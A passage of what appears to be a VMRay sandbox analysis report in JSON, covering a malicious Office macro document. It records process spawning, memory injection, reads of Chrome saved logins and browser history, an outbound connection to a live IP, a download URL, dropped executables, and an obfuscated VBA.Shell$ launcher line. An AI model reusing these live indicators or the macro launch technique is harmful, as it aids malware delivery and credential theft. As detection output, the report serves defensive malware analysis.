"mutex_name": "MB66D4A35", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 } ], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_install_ipc_endpoint", "operation_desc": "Create system object", "ref_gfncalls": [ { "ref_id": "gfn_5548", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 1, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_install_ipc_endpoint", "technique_desc": "Create mutex with name \"MB66D4A35\".", "technique_path": "built_in._process._install_ipc_endpoint.vmray_install_ipc_endpoint", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_document_create_process", "operation_desc": "Create process", "ref_gfncalls": [ { "ref_id": "gfn_5840", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_document_create_process", "technique_desc": "Create process \"\"C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe\" /scomma \"C:\\ProgramData\\C570.tmp\"\".", "technique_path": "built_in._process._document_create_process.vmray_document_create_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_document_create_process", "operation_desc": "Create process", "ref_gfncalls": [ { "ref_id": "gfn_5851", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_document_create_process", "technique_desc": "Create process \"\"C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe\" \"C:\\ProgramData\\C572.tmp\"\".", "technique_path": "built_in._process._document_create_process.vmray_document_create_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_document_create_process", "operation_desc": "Create process", "ref_gfncalls": [ { "ref_id": "gfn_5905", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_document_create_process", "technique_desc": "Create process \"\"C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe\" /scomma \"C:\\ProgramData\\C571.tmp\"\".", "technique_path": "built_in._process._document_create_process.vmray_document_create_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat", "hashes": [ { "md5_hash": "4d32b3456316311c50d77f7a37556236", "sha1_hash": "47f9117eb7cf12bd3c36295b8084e98d962b6861", "sha256_hash": "4ff606ec32478199d9183c9ec73ed4d0787f52ecc6504b7ce2d5cdf3ded0a5a6", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat", "operations": [ "read" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_browser", "category_desc": "Browser", "operation": "_browser_data_history", "operation_desc": "Read data related to browsing history", "ref_gfncalls": [ { "ref_id": "gfn_6007", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 3, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_read_browser_history", "technique_desc": "Read the browsing history for \"Microsoft Internet Explorer\".", "technique_path": "built_in._browser._browser_data_history.vmray_read_browser_history", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", "hashes": [], "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\google\\chrome\\user data\\default\\login data", "operations": [ "read" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_browser", "category_desc": "Browser", "operation": "_browser_data_credentials", "operation_desc": "Read data related to saved browser credentials", "ref_gfncalls": [ { "ref_id": "gfn_6954", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 3, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_read_browser_credentials", "technique_desc": "Read saved credentials for \"Google Chrome\".", "technique_path": "built_in._browser._browser_data_credentials.vmray_read_browser_credentials", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Apple Computer\\Preferences\\keychain.plist", "hashes": [], "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\roaming\\apple computer\\preferences\\keychain.plist", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_info_stealing", "category_desc": "Information Stealing", "operation": "_read_browser_data", "operation_desc": "Read browser data", "ref_gfncalls": [ { "ref_id": "gfn_6985", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_readout_browser_credentials", "technique_desc": "Possibly trying to readout browser credentials.", "technique_path": "built_in._info_stealing._read_browser_data.vmray_readout_browser_credentials", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_handle_with_malicious_files", "operation_desc": "Handle with malicious files", "ref_gfncalls": [], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_handle_with_malicious_files", "technique_desc": "File \"c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\temp\\42753.exe\" is a known malicious file.", "technique_path": "built_in._file_system._handle_with_malicious_files.vmray_handle_with_malicious_files", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_injection", "category_desc": "Injection", "operation": "_modify_memory_non_system", "operation_desc": "Write into memory of a process running from a created or modified executable", "ref_gfncalls": [], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_memory", "technique_desc": "\"c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost.exe\" modifies memory of \"c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost.exe\"", "technique_path": "built_in._injection._modify_memory_non_system.vmray_modify_memory", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_injection", "category_desc": "Injection", "operation": "_modify_control_flow_non_system", "operation_desc": "Modify control flow of a process running from a created or modified executable", "ref_gfncalls": [], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_control_flow_non_system", "technique_desc": "\"c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost.exe\" alters context of \"c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost.exe\"", "technique_path": "built_in._injection._modify_control_flow_non_system.vmray_modify_control_flow_non_system", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_connect", "operation_desc": "Connect to remote host", "ref_gfncalls": [ { "ref_id": "gfn_1049", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 3, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_tcp_out_connection", "technique_desc": "Outgoing TCP connection to host \"70.39.145.109:80\".", "technique_path": "built_in._network._connect.vmray_tcp_out_connection", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_network", "category_desc": "Network", "operation": "_download_data", "operation_desc": "Download data", "ref_gfncalls": [], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_download_data_http_request", "technique_desc": "URL \"neakmedia.com/hybfPDcL/\".", "technique_path": "built_in._network._download_data.vmray_download_data_http_request", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_pe", "category_desc": "PE", "operation": "_drop_pe_file", "operation_desc": "Drop PE file", "ref_gfncalls": [], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_drop_pe_file", "technique_desc": "Drop file \"c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\temp\\42753.exe\".", "technique_path": "built_in._pe._drop_pe_file.vmray_drop_pe_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_pe", "category_desc": "PE", "operation": "_drop_pe_file", "operation_desc": "Drop PE file", "ref_gfncalls": [], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_drop_pe_file", "technique_desc": "Drop file \"c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\ekgeobhbhtp7rxmh.exe\".", "technique_path": "built_in._pe._drop_pe_file.vmray_drop_pe_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_pe", "category_desc": "PE", "operation": "_execute_dropped_pe_file", "operation_desc": "Execute dropped PE file", "ref_gfncalls": [], "rule_score": 3, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_execute_dropped_pe_file", "technique_desc": "Execute dropped file \"c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\temp\\42753.exe\".", "technique_path": "built_in._pe._execute_dropped_pe_file.vmray_execute_dropped_pe_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_pe", "category_desc": "PE", "operation": "_execute_dropped_pe_file", "operation_desc": "Execute dropped PE file", "ref_gfncalls": [], "rule_score": 3, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_execute_dropped_pe_file", "technique_desc": "Execute dropped file \"c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\ekgeobhbhtp7rxmh.exe\".", "technique_path": "built_in._pe._execute_dropped_pe_file.vmray_execute_dropped_pe_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_vba", "category_desc": "VBA Macro", "operation": "_execute_macro_on_ws_event", "operation_desc": "Execute macro on specific worksheet event", "ref_gfncalls": [], "rule_score": 1, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_execute_macro_on_ws_event", "technique_desc": "Execute macro on \"Activate Workbook\" event.", "technique_path": "built_in._vba._execute_macro_on_ws_event.vmray_execute_macro_on_ws_event", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_vba", "category_desc": "VBA Macro", "operation": "_execute_application", "operation_desc": "Execute application", "ref_gfncalls": [], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_execute_application", "technique_desc": "VBA.Shell$ \"\" + rZCrTyu + gwUYEwFGR + SdCKBWRmm + dPgDectFAEK + zMZyYEh + GChpZzBgR + hkvnTphzVg + SgZmpppR + ActiveDocument.BuiltInDocumentProperties(\"Comme\" + \"nts\") + rZCrTyu + gwUYEwFGR + SdCKBWRmm + dPgDectFAEK + zMZyYEh + GChpZzBgR + hkvnTphzVg + SgZmpppR + sNhYNbxua, 0", "technique_path": "built_in._vba._execute_application.vmray_execute_application", "type": "vti_rule_match", "version": 1 } ], "vti_rule_type": "Documents", "vti_score": 100 }, "yara": { "apply_yara": true, "apply_yara_on_created_files": true, "apply_yara_on_modified_files": true, "apply_yara_on_pcap_file": true, "apply_yara_on_process_dumps": true, "apply_yara_on_sample_files": true, "match_count": 0, "matches": [], "ruleset_count": 7, "type": "yara", "version": 1 } }